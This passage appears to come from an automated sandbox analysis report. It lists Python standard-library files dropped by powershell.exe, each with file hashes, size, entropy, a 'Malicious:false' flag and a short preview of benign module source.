                                                                                                                                                                                                                      SHA1:1F2FC6FE33DF8844AC619D3D5037EDCBDEA78662
                                                                                                                                                                                                                      SHA-256:BAC33A85F39799938D6A532886F801F34CE29B8B2563F55EF7E56B41B3B9E44E
                                                                                                                                                                                                                      SHA-512:B2B6D8B00F27F9C349BA8129843AA3F686F7A19A0874D514759D0B7ACBA92EB82580DF42BE2B51C87044661999F8F5E928DD2FA0F9B9E151BE718E59F7AAE84F
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:"""Helper class to quickly write a loop over all standard input files.....Typical use is:.... import fileinput.. for line in fileinput.input(encoding="utf-8"):.. process(line)....This iterates over the lines of all files listed in sys.argv[1:],..defaulting to sys.stdin if the list is empty. If a filename is '-' it..is also replaced by sys.stdin and the optional arguments mode and..openhook are ignored. To specify an alternative list of filenames,..pass it as the argument to input(). A single file name is also allowed.....Functions filename(), lineno() return the filename and cumulative line..number of the line that has just been read; filelineno() returns its..line number in the current file; isfirstline() returns true iff the..line just read is the first line of its file; isstdin() returns true..iff the line was read from sys.stdin. Function nextfile() closes the..current file so that the next iteration will read the first line from..the next file (if any); lines not
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):6184
                                                                                                                                                                                                                      Entropy (8bit):4.341535614254614
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:192:mPdA3GVpok8oQAhpt4CLJzovn6WkPmByCJi9Xknf06cwVPR4E:a4VFaJQyCJi9XkBfx
                                                                                                                                                                                                                      MD5:25330CC531D5B235ACEF733F724A4D2C
                                                                                                                                                                                                                      SHA1:C2D58AA844C8AE698B214C40D37A12210508594B
                                                                                                                                                                                                                      SHA-256:146D27A2853CD14C95EE49CC6130B9F84E2A56618DD1BE695CDDB20489460425
                                                                                                                                                                                                                      SHA-512:1D0182832A5438068A17C51BD984D58EC7F9DB8AFCD4EAE10D2943794A269A096CAA501AD74A333756D15BD5F5275E01CBD55E2E4625570CD5BA44FCFBAD30AF
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:"""Filename matching with shell patterns.....fnmatch(FILENAME, PATTERN) matches according to the local convention...fnmatchcase(FILENAME, PATTERN) always takes case in account.....The functions operate by translating the pattern into a regular..expression. They cache the compiled regular expressions for speed.....The function translate(PATTERN) returns a regular expression..corresponding to PATTERN. (It does not compile it.).."""..import os..import posixpath..import re..import functools....__all__ = ["filter", "fnmatch", "fnmatchcase", "translate"]....def fnmatch(name, pat):.. """Test whether FILENAME matches PATTERN..... Patterns are Unix shell style:.... * matches everything.. ? matches any single character.. [seq] matches any character in seq.. [!seq] matches any char not in seq.... An initial period in FILENAME is not special... Both FILENAME and PATTERN are first case-normalized.. if the operating system requires it... If you don't wa
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Python script, Unicode text, UTF-8 text executable, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):39055
                                                                                                                                                                                                                      Entropy (8bit):4.466111115142351
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:768:s77Tfh/N5O9LGWKQF4TtnnBbV2ZmEpSgBX3+:s77VOFWTtnnQSAXO
                                                                                                                                                                                                                      MD5:7E2850AC9B9E3A17FF1565D843C90673
                                                                                                                                                                                                                      SHA1:8A36CF259DE590F018F729D450FA5D1BD5B19DF0
                                                                                                                                                                                                                      SHA-256:54DDEF0252DDBE76A3BEF3D821E1AE96BB5C655A1621B3B913C3EBDE9D762A00
                                                                                                                                                                                                                      SHA-512:9E0B5100C017961811E47D887B0AADDC2F143506C1E9EEBDDA14E9FCDAF505BB7EC1FE26DEB96625AE150DCAA0B22366ACA6E73E66FA71D424924FA8D072663D
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# Originally contributed by Sjoerd Mullender...# Significantly modified by Jeffrey Yasskin <jyasskin at gmail.com>....."""Fraction, infinite-precision, rational numbers."""....from decimal import Decimal..import functools..import math..import numbers..import operator..import re..import sys....__all__ = ['Fraction']......# Constants related to the hash implementation; hash(x) is based..# on the reduction of x modulo the prime _PyHASH_MODULUS..._PyHASH_MODULUS = sys.hash_info.modulus..# Value to be used for rationals that reduce to infinity modulo..# _PyHASH_MODULUS..._PyHASH_INF = sys.hash_info.inf....@functools.lru_cache(maxsize = 1 << 14)..def _hash_algorithm(numerator, denominator):.... # To make sure that the hash of a Fraction agrees with the hash.. # of a numerically equal integer, float or Decimal instance, we.. # follow the rules for numeric hashes outlined in the.. # documentation. (See library docs, 'Built-in Types')..... try:.. dinv = pow(denominator,
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Python script, Unicode text, UTF-8 text executable, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):35701
                                                                                                                                                                                                                      Entropy (8bit):4.519184524404518
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:768:xp+qv4dk/rJQJ9+Lx8CDSh8Y+3+amuimaw+QpkRi3edm:xpDTzJQJiDSh8Y+3+fuKMsi3ec
                                                                                                                                                                                                                      MD5:C76032BAC296A9BAAA8A1208DF75FCBE
                                                                                                                                                                                                                      SHA1:595516EA93DB2EC75426AB244A8A0E979A5C985B
                                                                                                                                                                                                                      SHA-256:B651A03A02373EE9844C52C5598CAB1ECB4F6D8E7864B514A303010AC32945EF
                                                                                                                                                                                                                      SHA-512:291333D13A2D2365CBB9A84AB2CC8E72109DBC9B559D1A50819B2B24B902EACD2BBC1477560D6B392B44E877AFC1604312C47433684EDBE4D78BC7FB3D0EA643
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:"""An FTP client class and some helper functions.....Based on RFC 959: File Transfer Protocol (FTP), by J. Postel and J. Reynolds....Example:....>>> from ftplib import FTP..>>> ftp = FTP('ftp.python.org') # connect to host, default port..>>> ftp.login() # default, i.e.: user anonymous, passwd anonymous@..'230 Guest login ok, access restrictions apply.'..>>> ftp.retrlines('LIST') # list directory contents..total 9..drwxr-xr-x 8 root wheel 1024 Jan 3 1994 ...drwxr-xr-x 8 root wheel 1024 Jan 3 1994 ....drwxr-xr-x 2 root wheel 1024 Jan 3 1994 bin..drwxr-xr-x 2 root wheel 1024 Jan 3 1994 etc..d-wxrwxr-x 2 ftp wheel 1024 Sep 5 13:43 incoming..drwxr-xr-x 2 root wheel 1024 Nov 17 1993 lib..drwxr-xr-x 6 1094 wheel 1024 Sep 13 19:07 pub..drwxr-xr-x 3 root wheel 1024 Jan 3 1994 usr..-rw-r--r-- 1 root root 312 Aug 1 1994 welcome.msg..'226 Transfer complete.'..>>> ft
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Python script, Unicode text, UTF-8 text executable, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):39132
                                                                                                                                                                                                                      Entropy (8bit):4.545306756804744
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:768:sWkDM+q6JeCAkxPN2NqXBF7sMHrCXZdgbV6ncxCD+jG:sWki6JeCAk7v7sMHrCpESfZ
                                                                                                                                                                                                                      MD5:3638D2608C42E3A3BF3B2B1C51B765F4
                                                                                                                                                                                                                      SHA1:BE947A9B8301BBEDF2406416AC908963279B46CD
                                                                                                                                                                                                                      SHA-256:BD6F192C31C5E266AD9EEC9F550B8BC485F90D583764FF81AA3F36D1209F005E
                                                                                                                                                                                                                      SHA-512:14B60F0B5119B90FCD4DB3B0AEB48EC4CA9775910470178796BA54C0D16F8887B9A3D283F925AF779A1CC6BC99D25F016CCCBF2BB72D4A9099BB821A54A2B418
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:"""functools.py - Tools for working with functions and callable objects.."""..# Python module wrapper for _functools C module..# to allow utilities written in Python to be added..# to the functools module...# Written by Nick Coghlan <ncoghlan at gmail.com>,..# Raymond Hettinger <python at rcn.com>,..# and .ukasz Langa <lukasz at langa.pl>...# Copyright (C) 2006-2013 Python Software Foundation...# See C source code for _functools credits/copyright....__all__ = ['update_wrapper', 'wraps', 'WRAPPER_ASSIGNMENTS', 'WRAPPER_UPDATES',.. 'total_ordering', 'cache', 'cmp_to_key', 'lru_cache', 'reduce',.. 'partial', 'partialmethod', 'singledispatch', 'singledispatchmethod',.. 'cached_property']....from abc import get_cache_token..from collections import namedtuple..# import types, weakref # Deferred to single_dispatch()..from reprlib import recursive_repr..from _thread import RLock..from types import GenericAlias......#############################################
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):5468
                                                                                                                                                                                                                      Entropy (8bit):4.6213245159421765
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:96:jqF24r0OS60O0gJN1Ng+jl2LyqSgPGfGeYM6Zf8lG4iuRs+laP8q+PCI7ocfz/r7:jqk4r0v60hePDhWL+fuMeebiuRPr/r/j
                                                                                                                                                                                                                      MD5:F2DA5A9BDBCCABBDD44D309002EA9661
                                                                                                                                                                                                                      SHA1:9DD844C2F69BE7C076B746F41F41B2FFAF7120A6
                                                                                                                                                                                                                      SHA-256:C540A28C560234D4D00D3451DFDDE05B404F81A38BDE87086CE8773021E1CC1B
                                                                                                                                                                                                                      SHA-512:C9E2465CD02976025A9831CFECB4C8E9B34D3DF2725A801EAF5E4C26EF8F90ED69E545D5990F6353BF4450D8D4E2BD020F46B854A74EC1C06FAB9A78F09C5F1C
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:"""..Path operations common to more than one OS..Do not use directly. The OS specific modules import the appropriate..functions from this module themselves..."""..import os..import stat....__all__ = ['commonprefix', 'exists', 'getatime', 'getctime', 'getmtime',.. 'getsize', 'isdir', 'isfile', 'islink', 'samefile', 'sameopenfile',.. 'samestat']......# Does a path exist?..# This is false for dangling symbolic links on systems that support them...def exists(path):.. """Test whether a path exists. Returns False for broken symbolic links""".. try:.. os.stat(path).. except (OSError, ValueError):.. return False.. return True......# This follows symbolic links, so both islink() and isdir() can be true..# for the same path on systems that support symlinks..def isfile(path):.. """Test whether a path is a regular file""".. try:.. st = os.stat(path).. except (OSError, ValueError):.. return False.. return stat.S_ISREG(st.st_m
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Python script, Unicode text, UTF-8 text executable, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):7703
                                                                                                                                                                                                                      Entropy (8bit):4.587932802475573
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:192:oSGuBRjBdvQQ0ZW4X0RfUFCo/g/FF+44VJ3X0WNoO:oj0dH0ZW4+LBwJnkO
                                                                                                                                                                                                                      MD5:2F404A8F69E1F65802672EC3D9BD7E22
                                                                                                                                                                                                                      SHA1:EBFB72BD6FB62F906431D7C229E5C6704DCD68D6
                                                                                                                                                                                                                      SHA-256:FE8C1422EFF6BE1280800A819718F88DCA24617F03BE09B91FE769F1483438E3
                                                                                                                                                                                                                      SHA-512:8E6DA70EDE01B516C7AC798F824D44E44659F81A6B21EC3203C2E55482355C92A661653378AB2EAF166F8CC23CF709F9C99E6BB960A95DEA9D0D5A97476810F8
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:"""Parser for command line options.....This module helps scripts to parse the command line arguments in..sys.argv. It supports the same conventions as the Unix getopt()..function (including the special meanings of arguments of the form `-'..and `--'). Long options similar to those supported by GNU software..may be used as well via an optional third argument. This module..provides two functions and an exception:....getopt() -- Parse command line options..gnu_getopt() -- Like getopt(), but allow option and non-option arguments..to be intermixed...GetoptError -- exception (class) raised with 'opt' attribute, which is the..option involved with the exception..."""....# Long option support added by Lars Wirzenius <liw@iki.fi>...#..# Gerrit Holl <gerrit@nl.linux.org> moved the string-based exceptions..# to class-based exceptions...#..# Peter .strand <astrand@lysator.liu.se> added gnu_getopt()...#..# TODO for gnu_getopt():..#..# - GNU getopt_long_only mechanism..# - allow the caller to spe
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):6175
                                                                                                                                                                                                                      Entropy (8bit):4.440480314278831
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:96:PX8OzPyKo5dCMPUwl5o0FvZGNYAp83byrYl4Npx2AfeX2RMqdzNydJdCymzGFQ6Z:0OOVvTAlNppYsYmpxvxRMqtM39Q6qQJ
                                                                                                                                                                                                                      MD5:0F8B3481C15E6805AFAD8EAE8E770FA1
                                                                                                                                                                                                                      SHA1:25DDD71B1BD1F38E61A70C1B53E40F0752D328DF
                                                                                                                                                                                                                      SHA-256:D2B77376A296CBDD0F659DA6CAB047426A4719D3F09949ABA8F334BD01E80593
                                                                                                                                                                                                                      SHA-512:0E7EE49047339D8DF9D1F233C6EB47004B76D41EE324DACBBDDDA4C55D7C85CFBBFCDE3F9762B9B51AEC6007DEA4796852846A35B8094E61B8F9D472C838B348
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:"""Utilities to get a password and/or the current user name.....getpass(prompt[, stream]) - Prompt for a password, with echo turned off...getuser() - Get the user name from the environment or password database.....GetPassWarning - This UserWarning is issued when getpass() cannot prevent.. echoing of the password contents while reading.....On Windows, the msvcrt module will be used....."""....# Authors: Piers Lauder (original)..# Guido van Rossum (Windows support and cleanup)..# Gregory P. Smith (tty support & GetPassWarning)....import contextlib..import io..import os..import sys..import warnings....__all__ = ["getpass","getuser","GetPassWarning"]......class GetPassWarning(UserWarning): pass......def unix_getpass(prompt='Password: ', stream=None):.. """Prompt for a password, with echo turned off..... Args:.. prompt: Written on stream to ask for the input. Default: 'Password: '.. stream: A writable file object to display the prompt. Def
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):21966
                                                                                                                                                                                                                      Entropy (8bit):4.538634415037831
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:384:8KE7Hoh/h9wzIhOPkvUKAWJLyR5Q5j7KdrmPECXKxlGt:8v2hEIh6kcKXZyraHKdrpxlGt
                                                                                                                                                                                                                      MD5:D25CEAB4564001991B850B3FBF0F1588
                                                                                                                                                                                                                      SHA1:96020C5932B754525F9C6998DB0DC4A406FE6C3B
                                                                                                                                                                                                                      SHA-256:DA55E22F51BB369819FE4CC1201459C8F18CA948B6CA00137E6DFD7012814D83
                                                                                                                                                                                                                      SHA-512:75582B3A6130E62C75D6591F8EF4227644AA136A53D64315C96FE340C2BC4AC2C1F590D3A9E4213354FBF37C13A6417EF8AED7F1D99329B46C7CC4FCDD20A595
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:"""Internationalization and localization support.....This module provides internationalization (I18N) and localization (L10N)..support for your Python programs by providing an interface to the GNU gettext..message catalog library.....I18N refers to the operation by which a program is made aware of multiple..languages. L10N refers to the adaptation of your program, once..internationalized, to the local language and cultural habits....."""....# This module represents the integration of work, contributions, feedback, and..# suggestions from the following people:..#..# Martin von Loewis, who wrote the initial implementation of the underlying..# C-based libintlmodule (later renamed _gettext), along with a skeletal..# gettext.py implementation...#..# Peter Funk, who wrote fintl.py, a fairly complete wrapper around intlmodule,..# which also included a pure-Python implementation to read .mo files if..# intlmodule wasn't available...#..# James Henstridge, who also wrote a gettext.py module, wh
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):8932
                                                                                                                                                                                                                      Entropy (8bit):4.450827698660452
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:192:pFcyAlKumAroiAo/MO3LMRcjRDa/ySlZaxixLOTu7tTy:pyBgeMro/MOyc9Da/X40xnhu
                                                                                                                                                                                                                      MD5:13A7EB4AA4C401CA703F736BC4DEC4DD
                                                                                                                                                                                                                      SHA1:A23D5478F9A1BCFD8BE84CA2E8088370F788195C
                                                                                                                                                                                                                      SHA-256:C99EF51E05BD23DEF219362EDE9AA76B393128D2A47C1AC0CF3912E330280BE0
                                                                                                                                                                                                                      SHA-512:7BD16A509F980FA0A0E25178465A7A217DE7B57028CA3EA7E3D69A6D49AC16F4EF7390F079C87243547DAAE9109A4F8B8AA45434D7B7C5FA60E7CCEB6AB88CDB
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:"""Filename globbing utility."""....import contextlib..import os..import re..import fnmatch..import itertools..import stat..import sys....__all__ = ["glob", "iglob", "escape"]....def glob(pathname, *, root_dir=None, dir_fd=None, recursive=False,.. include_hidden=False):.. """Return a list of paths matching a pathname pattern..... The pattern may contain simple shell-style wildcards a la.. fnmatch. Unlike fnmatch, filenames starting with a.. dot are special cases that are not matched by '*' and '?'.. patterns by default..... If `include_hidden` is true, the patterns '*', '?', '**' will match hidden.. directories..... If `recursive` is true, the pattern '**' will match any files and.. zero or more directories and subdirectories... """.. return list(iglob(pathname, root_dir=root_dir, dir_fd=dir_fd, recursive=recursive,.. include_hidden=include_hidden))....def iglob(pathname, *, root_dir=None, dir_fd=None, recursive=False,..
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):9906
                                                                                                                                                                                                                      Entropy (8bit):4.263228961608472
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:96:mNcRMEUR8YGCyTXFCRIBxgI1umbJrjMpxEIPktyaZN58Uff7yWPJyeTs7SD3Kqng:+iMEUmCyQMxgI0XEBX58UFXl+H
                                                                                                                                                                                                                      MD5:0D738AD9A15E7CECDDE6A2CDC8D1BD8E
                                                                                                                                                                                                                      SHA1:C8A824DFB20F05E0D8352CC32C2840FF97830D67
                                                                                                                                                                                                                      SHA-256:9C23A989085259603C38E401B7ECC7D9C2F591C0FEB7B4B74F5721B113197541
                                                                                                                                                                                                                      SHA-512:F328332BB3851F96878058D55BF8AC6DF34BCF8859E6526CFD54769781839D6A64CC34799C7732922D5C63076A0545A7D42703E35AB94B583989B06D68F2AE0C
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:from types import GenericAlias....__all__ = ["TopologicalSorter", "CycleError"]...._NODE_OUT = -1.._NODE_DONE = -2......class _NodeInfo:.. __slots__ = "node", "npredecessors", "successors".... def __init__(self, node):.. # The node this class is augmenting... self.node = node.... # Number of predecessors, generally >= 0. When this value falls to 0,.. # and is returned by get_ready(), this is set to _NODE_OUT and when the.. # node is marked done by a call to done(), set to _NODE_DONE... self.npredecessors = 0.... # List of successor nodes. The list can contain duplicated elements as.. # long as they're all reflected in the successor's npredecessors attribute... self.successors = []......class CycleError(ValueError):.. """Subclass of ValueError raised by TopologicalSorter.prepare if cycles.. exist in the working graph..... If multiple cycles exist, only one undefined choice among them will be reported.. and
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):25553
                                                                                                                                                                                                                      Entropy (8bit):4.537013140843265
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:384:4rr1HTcJt3MIIGYRDSErRaA2NBeT1r/LA5sRk8tQywQXBnW:JJtlAUvMutOQ8W
                                                                                                                                                                                                                      MD5:A2BBDCCE322EFF4C7142E1FE01D916C3
                                                                                                                                                                                                                      SHA1:B1F48E9BCBED9D38B99B7AC10F4F0B5A6545A4F2
                                                                                                                                                                                                                      SHA-256:AD3098B20FDA695A7CAEC7326D2CF0ABEEB253D8CBD943D18B44719C6E208141
                                                                                                                                                                                                                      SHA-512:5D33E1CA22A5A1E4630023341D0B7FF66C838B36388C458A57301B0866F11FEB2E33B82447E30FEF1B59C044166AB4927C98448B0664273AE9E34A820EC01C0E
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:"""Functions that read and write gzipped files.....The user of the file doesn't have to worry about the compression,..but random access is not allowed."""....# based on Andrew Kuchling's minigzip.py distributed with the zlib module....import struct, sys, time, os..import zlib..import builtins..import io..import _compression....__all__ = ["BadGzipFile", "GzipFile", "open", "compress", "decompress"]....FTEXT, FHCRC, FEXTRA, FNAME, FCOMMENT = 1, 2, 4, 8, 16....READ, WRITE = 1, 2...._COMPRESS_LEVEL_FAST = 1.._COMPRESS_LEVEL_TRADEOFF = 6.._COMPRESS_LEVEL_BEST = 9....READ_BUFFER_SIZE = 128 * 1024.._WRITE_BUFFER_SIZE = 4 * io.DEFAULT_BUFFER_SIZE......def open(filename, mode="rb", compresslevel=_COMPRESS_LEVEL_BEST,.. encoding=None, errors=None, newline=None):.. """Open a gzip-compressed file in binary or text mode..... The filename argument can be an actual filename (a str or bytes object), or.. an existing file object to read from or write to..... The mode argument can be
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):9602
                                                                                                                                                                                                                      Entropy (8bit):4.879612409796633
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:96:KSBDUhawz9fJ+8lOVaX2B91c+jZIJ0tMmLfGfpR9eGe9IpeuR95x4SQZRvP5W2XB:KSBmfj2pDMmqpR+9u5d45ZRvIMWJiKi
                                                                                                                                                                                                                      MD5:5F4B662810ACBFA30869931BDEE5FCB0
                                                                                                                                                                                                                      SHA1:FE52497C8FCCC080D01804CE0F04C94D39008D63
                                                                                                                                                                                                                      SHA-256:F0C8900585062C567A283CB782C3C867F86C38516E30F1F98A04FFA775B9A013
                                                                                                                                                                                                                      SHA-512:9B74E620D2BBA0AF3C948D8A0B12F9ADBEDA6AE4E0F04A3FA1B1867B64C0D771DFD17A18C46E0C97785BEE1E020193FD375E109CDD20F69A3A318F68CB156414
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:#. Copyright (C) 2005-2010 Gregory P. Smith (greg@krypto.org)..# Licensed to PSF under a Contributor Agreement...#....__doc__ = """hashlib module - A common interface to many hash functions.....new(name, data=b'', **kwargs) - returns a new hash object implementing the.. given hash function; initializing the hash.. using the given binary data.....Named constructor functions are also available, these are faster..than using new(name):....md5(), sha1(), sha224(), sha256(), sha384(), sha512(), blake2b(), blake2s(),..sha3_224, sha3_256, sha3_384, sha3_512, shake_128, and shake_256.....More algorithms may be available on your platform but the above are guaranteed..to exist. See the algorithms_guaranteed and algorithms_available attributes..to find out what algorithm names can be passed to new().....NOTE: If you want the adler32 or crc32 hash functions they are available in..the zlib module.....Choose your hash function wisely.
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Python script, Unicode text, UTF-8 text executable, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):23627
                                                                                                                                                                                                                      Entropy (8bit):4.577391750067338
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:384:zIRh8ImoQ2TaWDxr0K6rNK3WahBUmYcqV3+oxjTe+ENxd1S2+HGRh:zIb8ImTiA5cgxjT4xdGH+
                                                                                                                                                                                                                      MD5:DA0A9B9E8C81A7158C59C0DE95F1A4C4
                                                                                                                                                                                                                      SHA1:57F50A27C9D4EF9FFE5643223D0993A416FD3131
                                                                                                                                                                                                                      SHA-256:5BDBF0450B6721F00FB0508FCE97625C9560A87CCAE8D551D94A3E220C8195E6
                                                                                                                                                                                                                      SHA-512:C5A201AA2EAE6BFC2AD2AB4A69ABE65F35D54AF04AB458AFF51AE22795CABA7B02633B3DE3DD474A9242566DA6B877D81C0CA1111B790BFA069AA1E1798EEB85
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:"""Heap queue algorithm (a.k.a. priority queue).....Heaps are arrays for which a[k] <= a[2*k+1] and a[k] <= a[2*k+2] for..all k, counting elements from 0. For the sake of comparison,..non-existing elements are considered to be infinite. The interesting..property of a heap is that a[0] is always its smallest element.....Usage:....heap = [] # creates an empty heap..heappush(heap, item) # pushes a new item on the heap..item = heappop(heap) # pops the smallest item from the heap..item = heap[0] # smallest item on the heap without popping it..heapify(x) # transforms list into a heap, in-place, in linear time..item = heappushpop(heap, item) # pushes a new item and then returns.. # the smallest item; the heap size is unchanged..item = heapreplace(heap, item) # pops and returns smallest item, and adds.. # new item; the heap size is unchanged....Our API differs from textbook heap algorithms as follows:....-
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):7935
                                                                                                                                                                                                                      Entropy (8bit):4.550376078499665
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:192:6ko2Qnkb5tQl/eFrNry3HYO429+036i5BhzRG8j:6ko2QM5tQlmFrNr/O4L03HhzRD
                                                                                                                                                                                                                      MD5:88A1B95384888F83DC615F6A74FBE6F9
                                                                                                                                                                                                                      SHA1:05B1DB3735DAE7501945A1D463A52091509DF110
                                                                                                                                                                                                                      SHA-256:B3A1C91643BEB33A3D31EF4048500CD852C46967595D332ED64358D807205192
                                                                                                                                                                                                                      SHA-512:4FCAA4ACF5F96B3C31AA90F88CC48758361C9C2AB12B5BCDC4437ED9A393DDF165CE852CDB5CA424C80F24172F29B918885664D4ADDE8EF0083C740ED7458441
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:"""HMAC (Keyed-Hashing for Message Authentication) module.....Implements the HMAC algorithm as described by RFC 2104..."""....import warnings as _warnings..try:.. import _hashlib as _hashopenssl..except ImportError:.. _hashopenssl = None.. _functype = None.. from _operator import _compare_digest as compare_digest..else:.. compare_digest = _hashopenssl.compare_digest.. _functype = type(_hashopenssl.openssl_sha256) # builtin type....import hashlib as _hashlib....trans_5C = bytes((x ^ 0x5C) for x in range(256))..trans_36 = bytes((x ^ 0x36) for x in range(256))....# The size of the digests returned by HMAC depends on the underlying..# hashing module used. Use digest_size from the instance of HMAC instead...digest_size = None......class HMAC:.. """RFC 2104 HMAC class. Also complies with RFC 4231..... This supports the API for Cryptographic Hash Functions (PEP 247)... """.. blocksize = 64 # 512-bit HMAC; can be changed in subclasses..... __slots__ = (..
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):4907
                                                                                                                                                                                                                      Entropy (8bit):5.128389447372523
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:96:ER1Op3Kv5VjLGXWa1OECg5KmXhtdVXLrVEWoFX2SCTSCXxF3t42xWQZxmQsl1RNe:EeEVjLGma0ECg5KmXBV7rDkCWCX/9QcB
                                                                                                                                                                                                                      MD5:8E08D329C5B69E5EBC8E5E746F0F3475
                                                                                                                                                                                                                      SHA1:42D44F91FAF5CA6FBBFB37FAB69A439366CA1E6E
                                                                                                                                                                                                                      SHA-256:4AF8ED80247D7CC374E1D4A6FCC5244212A8DE668E40B11C0F328DB33C686FEF
                                                                                                                                                                                                                      SHA-512:4F8E92BE17B73C02C9B170B421726CF3BDE7186287B95E56811B39FB9228BCFBD1B958F6A687AB0700CB3DF063502B304DDE70ED79A90BC0C53DC047D92D80E1
                                                                                                                                                                                                                      Malicious:false
